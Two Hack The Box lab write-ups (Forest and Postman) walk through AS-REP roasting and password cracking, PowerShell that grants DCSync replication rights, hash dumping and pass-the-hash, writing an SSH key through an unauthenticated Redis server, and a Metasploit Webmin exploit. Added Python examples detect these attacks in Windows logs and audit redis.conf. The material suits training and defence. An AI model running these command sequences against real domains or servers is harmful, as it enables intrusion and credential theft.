Hack The Box - Forest Writeup

System Information




Initial Enumeration


It is a Windows machine, so we start with enum4linux:

Domain name: HTB

Users:    
  • andy (Andy hislip)
  • lucinda (Lucinda Berger)
  • sebastien (Sebastien Caron)
  • mark (Mark Brandt)
  • santi (Santi Rodriguez)
  • ezra
  • Svc-alfresco


After some checks we can discover that svc-alfresco doesn't require Kerberos pre-authentication, so we can use the Impacket script GetNPUsers.py.
This script returns an AS-REP (the KDC reply carrying the TGT) for the user even without knowing the password; its encrypted part can be cracked offline.

# ./GetNPUsers.py  -request  -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d935a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d

The $krb5asrep.... output is in a format John the Ripper understands, and we can crack it with the rockyou wordlist:

# john --wordlist=../../rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 24.38% (ETA: 03:58:12) 0g/s 334503p/s 334503c/s 334503C/s smf1180..smf,727
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:12 DONE (2019-11-04 03:57) 0.08176g/s 334072p/s 334072c/s 334072C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

# john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB:s3rvice

1 password hash cracked, 0 left

This gives us the password: s3rvice
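From the defender's side, the condition that made this possible is an account flagged "Do not require Kerberos preauthentication", and the roasting itself leaves a footprint in Security event 4768. The following is an added example, not part of the writeup: it audits a constructed userAccountControl snapshot for that flag and scans constructed 4768 records for the no-pre-auth, RC4 pattern that GetNPUsers.py produces (all account and log data are made up for the demo).

```python
import json

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit set by "Do not require Kerberos preauthentication"
RC4_HMAC = 0x17              # etype 23, the $krb5asrep$23$ type John cracked above

# Constructed directory snapshot: sAMAccountName -> userAccountControl
USERS = {
    "andy": 0x10200,           # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "svc-alfresco": 0x410200,  # the same plus DONT_REQ_PREAUTH
    "krbtgt": 0x10202,         # NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_EXPIRE_PASSWORD
}

# Constructed Security 4768 (TGT requested) events, one JSON object per line
EVENTS = """
{"EventID": 4768, "TargetUserName": "andy", "IpAddress": "10.10.10.50", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc-alfresco", "IpAddress": "10.10.15.223", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "mark", "IpAddress": "10.10.15.223", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x19"}
{"EventID": 4769, "TargetUserName": "svc-alfresco", "IpAddress": "10.10.15.223", "TicketEncryptionType": "0x17", "Status": "0x0"}
""".strip().splitlines()

def roastable_accounts(users):
    """Accounts whose UAC carries DONT_REQ_PREAUTH can be roasted exactly like
    svc-alfresco; the list should be empty, or every entry justified."""
    return sorted(name for name, uac in users.items() if uac & DONT_REQ_PREAUTH)

def asrep_roast_hits(lines):
    """4768 with PreAuthType 0 and the RC4 etype is what GetNPUsers.py leaves
    behind; Status 0x0 means the KDC actually returned the crackable AS-REP,
    while 0x19 (pre-auth required) shows the same probe being refused."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") == "0" and int(ev["TicketEncryptionType"], 16) == RC4_HMAC:
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits

if __name__ == "__main__":
    print("accounts without pre-auth:", roastable_accounts(USERS))
    print("AS-REP roasts seen in log:", asrep_roast_hits(EVENTS))
```

The refused request for mark is kept in the sample on purpose: a burst of 4768 with Status 0x19 from one source is the enumeration phase that precedes a successful roast.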

We can discover shares using this account:

smbclient -L 10.10.10.161 -U "htb/svc-alfresco"
Enter HTB\svc-alfresco's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Failed to connect with SMB1 -- no workgroup available


Initial Foothold & User Flag


We can use WinRM to get access as svc-alfresco:

We can navigate to desktop and get the user flag:




Root Flag


Doing further enumeration we can discover that the svc-alfresco user can add new users and also add them to some groups, like "Exchange Windows Permissions".
So I created a standard user and added it to the relevant groups:


net user nik Nik-1234 /add
net group "Exchange Windows Permissions" nik /ADD /DOMAIN
net localgroup "Remote Management Users" nik /ADD


Once logged in as the new user over WinRM, I used SharpHound to collect all the information about Active Directory and found a possible path to Domain Admins:



It seems that there is a path from my user to the HTB.local domain through the Exchange Windows Permissions group.
This is explained in:

I used a command sequence:

$acl = get-acl "ad:DC=htb,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType

$acl.AddAccessRule($ace)

Now the user nik holds the extended right DS-Replication-Get-Changes-All on the domain, which means the account can replicate AD data and therefore read every attribute stored in the domain, password hashes included.
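Exercising this right shows up on the domain controller as Security event 4662 on the domain object, with the replication rightsGuid values in the Properties field. The following is an added example, not part of the writeup: it runs a DCSync check over constructed 4662 records, flagging any principal that is not a domain controller (the FOREST$ computer account and all events are made up for the demo).

```python
import json

# rightsGuid of the three replication extended rights; the writeup's ACE grants the first
REPLICATION_RIGHTS = {
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100            # AccessMask bit for an extended-right (control access) operation
DOMAIN_CONTROLLERS = {"FOREST$"}  # constructed: the only principals expected to replicate

# Constructed Security 4662 events on the domain object, one JSON object per line
EVENTS = """
{"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "nik", "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"}
{"EventID": 4662, "SubjectUserName": "nik", "AccessMask": "0x10", "Properties": "{00000000-0000-0000-0000-000000000000}"}
""".strip().splitlines()

def dcsync_hits(lines, allowed=DOMAIN_CONTROLLERS):
    """A control-access 4662 whose Properties name a replication right, issued by a
    principal that is not a domain controller, is the DCSync footprint."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 4662 or not int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
            continue
        guids = {g.strip("{}") for g in ev.get("Properties", "").split()}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        if rights and ev["SubjectUserName"] not in allowed:
            hits.append((ev["SubjectUserName"], rights))
    return hits

if __name__ == "__main__":
    for who, rights in dcsync_hits(EVENTS):
        print(f"replication by non-DC {who}: {', '.join(rights)}")
```

The earlier signal is the ACL change itself: an audited write to nTSecurityDescriptor on the domain object (event 5136) granting these GUIDs to a non-default principal should be rare enough to alert on.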


Then we can go back to Impacket and use secretsdump.py to dump all the password hashes and Kerberos keys:

We don't need to crack any hash: we can pass the Administrator NTLM hash directly to Impacket's wmiexec.py and get a shell:

And then the root flag:


Hack The Box - Postman Writeup

System Information



Initial Enumeration

The Nmap scan shows some available services:


  • Port 10000 is usually allocated to and used by Webmin, a well-known web application for managing a Linux system
  • Port 6379 is used by the Redis server, an in-memory data store that can be used as a database, cache or message broker

My first check was to look for known vulnerabilities in Webmin (there have been some in the past), but this version did not seem vulnerable to any RCE or other remote vulnerability.
I also tried some brute-forcing of accounts, but with no result.


Initial foothold

So my focus turned on redis.

According to an article by the Redis author (http://antirez.com/news/96, mirrored at https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html), there is no security model in the Redis server.
It's up to the administrator to put security measures upstream (i.e. not exposing it to untrusted users, etc.).

The articles also explain (in an obfuscated way) how to leverage some features/commands to write files into the server's filesystem.

The next step for exploitation is understanding those commands and trying to use them (maybe in a different order).
First we need the home folder of the Redis process: on Debian (and derivative distros) the Redis server runs as the redis user, whose home folder is /var/lib/redis.

So the exploitation we can try is to write an SSH key of our choice into /var/lib/redis/.ssh/ with the filename authorized_keys.

We create an SSH key pair and put the public part in key.txt, while the private part goes into id_rsa.

Next we can connect to redis with the client:

# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir "/var/lib/redis/.ssh"
1) "dir"
2) "/var/lib/redis/.ssh"
(0.70s)
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
(0.51s)
10.10.10.160:6379> save
OK
(1.04s)                             
10.10.10.160:6379>

The commands given above configure the Redis server so that its database file is /var/lib/redis/.ssh/authorized_keys.

Then we can pass the public key to the Redis server, which will save it in the "database":
# cat key.txt | redis-cli  -h 10.10.10.160 -x set attack3
OK

# redis-cli  -h 10.10.10.160 save
OK
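Every step of that sequence depends on a server-side setting: a listener reachable from outside, protected mode off, no password, and CONFIG and SAVE still callable. The following is an added example, not part of the writeup: a small redis.conf auditor run over two constructed configurations, the exposed one and a hardened one where those preconditions are removed (both config texts and the placeholder password are made up).

```python
WEAK_CONF = """
# constructed: roughly what an exposed Debian/Ubuntu Redis looked like in this box
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """
# constructed: same server with the preconditions of the attack removed
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SAVE ""
rename-command DEBUG ""
dir /var/lib/redis
"""

def parse_conf(text):
    """redis.conf is 'keyword args...' per line; keep repeats (rename-command) as a list."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, rest = line.partition(" ")
            conf.setdefault(key.lower(), []).append(rest.strip())
    return conf

def audit(text):
    """Findings, in fixed order, for the settings the CONFIG SET / SAVE trick relies on."""
    conf = parse_conf(text)
    findings = []
    binds = " ".join(conf.get("bind", ["0.0.0.0"])).split()  # no bind line: all interfaces
    if any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listens on all interfaces")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "requirepass" not in conf:
        findings.append("requirepass: no authentication required")
    # rename-command X "" disables X; Redis 6+ ACLs are the newer way to do the same
    disabled = {r.split()[0].upper() for r in conf.get("rename-command", []) if r.split()[1:] == ['""']}
    for cmd, why in (("CONFIG", "can retarget dir/dbfilename"), ("SAVE", "can write the dump on demand")):
        if cmd not in disabled:
            findings.append(f"{cmd}: still reachable, {why}")
    return findings

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

A dump file suddenly appearing under a .ssh directory, or a CONFIG SET of dir/dbfilename in the Redis log, is the runtime counterpart of these static findings.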

After these commands we should be able to log on to the server using the private part of the key:

# ssh -i id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Nov  5 09:15:54 2019 from 10.10.15.223
redis@Postman:~$ uptime
 09:17:14 up 2 min,  2 users,  load average: 19.64, 8.00, 2.99
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)


And we are in the system as redis.

This foothold will disappear quickly if someone else exploits the box the same way and overwrites our SSH public key, or if someone resets the box (the filesystem returns to a clean state).

User flag


The next step is to enumerate the system to find a way to escalate to another user. There are many ways (LinEnum, find, etc.).
We can find an RSA private key in /opt/id_rsa.bak:



Unfortunately we can't use it directly because it's encrypted, but there is a tool named ssh2john.py that converts the key to a format John the Ripper can crack.

Once the key is converted we can crack it with the rockyou wordlist:

So the password is computer2008.
We can use it to log in as the user Matt and get the user flag:


Root Flag

User Matt is part of the adm group:

So let's try to log in to Webmin as Matt:


This version of Webmin is 1.910 and there is a known vulnerability (CVE-2019-12840) that an authenticated user can exploit to execute commands:


There is even a Metasploit module for this CVE, named linux/http/webmin_packageup_rce.
We can use it after setting the relevant options:

And then run the exploit to get a shell as the user running Webmin (since Webmin is used to manage the system, it runs as root):



And we can then show the root flag: